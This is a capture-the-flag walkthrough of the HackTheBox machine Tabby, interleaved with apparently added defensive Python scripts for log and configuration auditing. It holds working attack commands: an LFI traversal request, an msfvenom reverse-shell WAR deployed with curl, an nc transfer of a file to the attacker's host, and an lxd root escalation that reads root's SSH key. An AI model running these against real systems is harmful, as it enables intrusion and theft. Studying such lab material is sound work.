SecWalk.com

HTB Walkthrough Tabby 10.10.10.194

Summary

Tabby was released on the 20th of June and is rated as an Easy box.

Foothold

Nmap shows only three open ports: 22, 80 and 8080. On port 80 we see a web page that is vulnerable to LFI.

User

After finding the LFI and the right file, we get credentials for the Tomcat server running on port 8080. With these we were able to obtain a shell using Metasploit. After some enumeration we found a zip file; after successfully brute-forcing its password we were able to switch to the user ash and get the user flag.

Root

The user ash is a member of the lxd group, which we can use to get root privileges.

Enumeration

Nmap

nmap -sC -sV 10.10.10.194

Web

We get a page when we visit http://10.10.10.194. It also leaks a hostname and an e-mail address.

Adding the hostname to my hosts file:

When we visit the page again using the DNS name we get the same page.

In the background I start gobuster to see if there are any other interesting files or directories:

gobuster dir -u http://megahosting.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

When we click on the news link we get a page not found error, but the link itself looks interesting:

http://megahosting.htb/news.php?file=statement

This link looks like it could be vulnerable to LFI (local file inclusion).

Let's investigate this with Burp:

When we visit this page we keep getting unknown host. First I thought there was brute-force detection and that using gobuster might have locked me out, but after some investigation it turned out that was not the case.

When we change the host to 10.10.10.194 we get a page.

Now it's time to see if there is any LFI.

Change the request to: GET /news.php?file=/../../../../../../../../../etc/passwd
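From the defender's side, the request above leaves a very recognisable trace in the web server's access log. The following script is an added example, not code from the original post: it parses a few constructed Apache-style log lines (the traversal request is modelled on the news.php?file= request shown here), decodes the query parameters, including double-encoded ones, and flags any parameter that carries "../" sequences, a null byte, or a well-known sensitive path. The log format, sample lines and the SENSITIVE list are my assumptions.

```python
import re
from urllib.parse import unquote, urlparse, parse_qs

# Constructed sample access-log lines (not taken from the box). The second and third
# requests mimic the shape of an LFI probe against a file= parameter.
SAMPLE_LOG = """\
10.10.14.4 - - [20/Jun/2020:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1024
10.10.14.4 - - [20/Jun/2020:10:01:09 +0000] "GET /news.php?file=/../../../../../../../../../etc/passwd HTTP/1.1" 200 2048
10.10.14.4 - - [20/Jun/2020:10:01:15 +0000] "GET /news.php?file=..%2F..%2Fusr%2Fshare%2Ftomcat9%2Fetc%2Ftomcat-users.xml HTTP/1.1" 200 980
10.10.14.4 - - [20/Jun/2020:10:01:20 +0000] "GET /index.php HTTP/1.1" 200 3000
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Path fragments that should never be reachable through a web parameter (assumed list)
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", "/proc/self", ".ssh/")


def decode_param(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the reasons (possibly empty) why a request target looks like path traversal / LFI."""
    reasons = []
    # parse_qs already performs one round of percent-decoding on the values
    query = parse_qs(urlparse(target).query, keep_blank_values=True)
    for name, values in query.items():
        for raw in values:
            val = decode_param(raw)
            if "../" in val or "..\\" in val:
                reasons.append(f"traversal in {name}")
            if any(s in val for s in SENSITIVE):
                reasons.append(f"sensitive path in {name}")
            if "\x00" in val:
                reasons.append(f"null byte in {name}")
    return reasons


def scan_log(text):
    """Parse each access-log line; return (ip, target, status, reasons) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the whole scan
        reasons = classify_request(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], int(m["status"]), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, status, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target} -> {', '.join(reasons)}")
```

A status of 200 on a flagged request is the signal worth alerting on: a traversal attempt that the application rejected would normally return a 4xx or an empty body, whereas a 200 with a non-trivial size suggests the include succeeded.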

Now it's time to see if we can find any interesting files.

When we look at http://10.10.10.194:8080/ we see that Tomcat is installed and that there is a way to authenticate. With this knowledge I start searching for Tomcat files that could give me these credentials.

The Tomcat page already mentions a few locations:

/var/lib/tomcat9/webapps/ROOT/index.html

/usr/share/tomcat9

/var/lib/tomcat9

/usr/share/doc/tomcat9-common/RUNNING.txt.gz

/etc/tomcat9/tomcat-users.xml

The last one doesn't exist, which is a bit odd.

Since /usr/share/tomcat9 is the home folder, I tried whether the etc folder existed there, and it did:

GET /news.php?file=/../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

This page also shows that this is a default location:

https://packages.debian.org/sid/all/tomcat9/filelist

We found credentials for Tomcat:

tomcat:$3cureP4s5w0rd123!
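The root cause here is a tomcat-users.xml that grants management roles and is readable by the account the web server runs as. The script below is an added example (my own, not from the post or from Tomcat): it parses a constructed tomcat-users.xml in the standard <role>/<user> layout, lists every user holding a Manager or Host Manager role, and checks whether the file is group- or world-readable. The sample file, its placeholder password, the PRIVILEGED_ROLES set and the demo temp-file path are all assumptions.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample (not the box's file); passwords are obvious placeholders.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="reporting"/>
  <user username="tomcat" password="example-not-a-real-password" roles="admin-gui,manager-script"/>
  <user username="reporter" password="example-not-a-real-password" roles="reporting"/>
</tomcat-users>
"""

# Roles that allow deploying applications or administering virtual hosts (assumed list)
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}
NS = "{http://tomcat.apache.org/xml}"


def privileged_users(xml_text):
    """Return {username: sorted privileged roles} for every user that can deploy or administer."""
    root = ET.fromstring(xml_text)
    found = {}
    # A file either uses the Tomcat namespace or none at all, so this never double-counts
    for user in list(root.iter(NS + "user")) + list(root.iter("user")):
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        priv = sorted(roles & PRIVILEGED_ROLES)
        if priv:
            found[user.get("username")] = priv
    return found


def permission_findings(path):
    """Flag a credentials file that accounts other than its owner can read."""
    mode = os.stat(path).st_mode
    findings = []
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & stat.S_IRGRP:
        findings.append("group-readable")
    return findings


def audit(path):
    """Combine the role check and the permission check for one tomcat-users.xml."""
    with open(path, encoding="utf-8") as fh:
        users = privileged_users(fh.read())
    return {"privileged_users": users, "permissions": permission_findings(path)}


def demo():
    """Write the sample to a temporary file with a deliberately loose mode and audit it."""
    with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as fh:
        fh.write(SAMPLE_TOMCAT_USERS)
        path = fh.name
    os.chmod(path, 0o644)  # too permissive for a file holding credentials
    try:
        return audit(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

On a real host you would point audit() at the live file (the post shows it living under /usr/share/tomcat9/etc/ on this box); a clean result is no privileged users beyond the ones you expect and an empty permissions list, which in practice means the file is owned by root with a mode of 0640 and group tomcat, so the web server account cannot read it through an include bug.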

We cannot log in to http://10.10.10.194:8080/manager/html,

but there is a second one at http://10.10.10.194:8080/host-manager/

And we are logged in:

Normally we could now upload a WAR file and get a shell, but we cannot do that this time.

Method 1: Shell with Metasploit

There is a Metasploit module we could try to get a shell:

msfconsole

use exploit/multi/http/tomcat_mgr_deploy

Setting the options:

After running it we obtained our shell:

Method 2: Shell with curl

First we need to create a malicious WAR file. We can do this with msfvenom:

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=81 -f war -o secwalk.war

Run the listener:

msfconsole -x "use exploit/multi/handler; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 10.10.14.10; set LPORT 81; run"

curl command to upload the WAR file (the credentials and the URL are single-quoted so that the shell does not expand the $ and ! in the password or treat the & in the query string as a background operator):

curl -T secwalk.war -u 'tomcat:$3cureP4s5w0rd123!' 'http://10.10.10.194:8080/manager/text/deploy?path=/secwalk&update=true'

Visit http://10.10.10.194:8080/secwalk

And we have our shell:

Getting the other user:

After looking around we find a zip file named 16162020_backup.zip.

Transfer the file to my machine:

On the victim machine: nc -w 3 10.10.14.4 81 < 16162020_backup.zip

On my machine: nc -l -p 81 > 16162020_backup.zip

When trying to unzip it, it turns out to be password protected. I used fcrackzip to brute-force the password:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 16162020_backup.zip

Password found:

admin@it

unzip 16162020_backup.zip

The files didn't contain anything interesting, so let's try whether this password works for the user ash:

We got our user shell:

Privilege escalation

The id command shows that ash is a member of the lxd group.

It could be vulnerable to this, so let's try it out:

Source: https://www.hackingarticles.in/lxd-privilege-escalation/

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder/

./build-alpine

python -m SimpleHTTPServer 80

On the target machine:

wget http://10.10.14.4/alpine-v3.12-x86_64-20200621_0657.tar.gz

lxc image import alpine-v3.12-x86_64-20200621_0657.tar.gz --alias secwalk

lxc init secwalk ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/secwalk/ recursive=true

lxc start ignite

lxc exec ignite /bin/sh


cd /mnt/secwalk

cat root/.ssh/id_rsa

chmod 600 id_rsa

ssh -i id_rsa root@10.10.10.194

And we successfully rooted this machine.
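The whole privilege escalation rests on one fact: membership of the lxd group lets an unprivileged user start a privileged container with the host's root filesystem mounted inside it, which is equivalent to root. The script below is an added example (mine, not part of the post or of lxd) that a defender can run as a periodic audit: it parses constructed /etc/group and /etc/passwd content, resolves both supplementary and primary-group membership, and reports every non-root login user who sits in a root-equivalent group. The sample file contents and the ROOT_EQUIVALENT_GROUPS set are my assumptions.

```python
# Constructed /etc/group and /etc/passwd content (not copied from the box).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice
lxd:x:116:ash
docker:x:998:bob
www-data:x:33:
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ash:x:1000:1000:ash:/home/ash:/bin/bash
alice:x:1001:1001::/home/alice:/bin/bash
bob:x:1002:1002::/home/bob:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Groups whose membership lets a user reach root without a password prompt (assumed list)
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}


def parse_group(text):
    """Map group name -> {'gid': int, 'members': set} from /etc/group-style lines."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": {m for m in members.split(",") if m}}
    return groups


def parse_passwd(text):
    """Map user name -> {'uid', 'gid', 'shell'} from /etc/passwd-style lines."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "shell": shell}
    return users


def root_equivalent_members(group_text, passwd_text):
    """Return sorted (user, group) pairs for non-root users in root-equivalent groups."""
    groups = parse_group(group_text)
    users = parse_passwd(passwd_text)
    findings = []
    for gname in sorted(ROOT_EQUIVALENT_GROUPS & groups.keys()):
        gid = groups[gname]["gid"]
        members = set(groups[gname]["members"])
        # Primary-group membership is recorded in /etc/passwd, not in the /etc/group member list
        members |= {u for u, info in users.items() if info["gid"] == gid}
        for member in sorted(members):
            info = users.get(member)
            if info is None or info["uid"] == 0:
                continue  # unknown account or root itself: nothing to escalate
            findings.append((member, gname))
    return findings


if __name__ == "__main__":
    for user, group in root_equivalent_members(SAMPLE_GROUP, SAMPLE_PASSWD):
        print(f"{user} is in root-equivalent group {group}")
```

To audit a live host, read /etc/group and /etc/passwd and pass their contents in; every reported pair should map to a documented administrator, and an application or backup account showing up in lxd or docker is exactly the finding that turned ash into root on this box.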

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
